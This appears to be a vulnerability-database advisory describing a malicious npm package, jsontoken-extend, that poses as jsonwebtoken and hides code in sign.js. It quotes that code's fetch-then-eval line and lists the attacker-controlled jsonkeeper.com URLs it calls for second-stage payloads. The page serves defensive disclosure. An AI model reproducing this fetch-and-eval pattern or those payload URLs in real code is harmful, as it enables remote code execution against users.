VDB

GCVE-110-OSM-2026-1362

GCVE-110-OSM-2026-1362
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published March 30, 2026
Executes two independent remote second-stage payloads fetched from attacker-controlled domain www.jsonkeeper.com (https://www.jsonkeeper.com/b/2NZOS and https://www.jsonkeeper.com/b/UPBF0) via fetch + eval injected at lines 65 and 83 of sign.js. Masquerades as jsonwebtoken — the malicious eval fires during every JWT signing operation, targeting authentication-critical codepaths. sign.js stores two base64-encoded C2 URLs (HS_STRING, TOKEN_STRING). At lines 65 and 83 the module calls fetch(atob(HS_STRING/TOKEN_STRING)).then(r=>r.json()).then(d=>{eval(codeString);}) — two remote JS payloads are fetched and eval'd. Injected into a 9.7 KB copy of the legitimate jsonwebtoken sign.js. Uses same fetch-eval pattern as campaign siblings path-extend and path-internal.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownjsontoken-extend1.0.5 (affected)

References

vendor

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›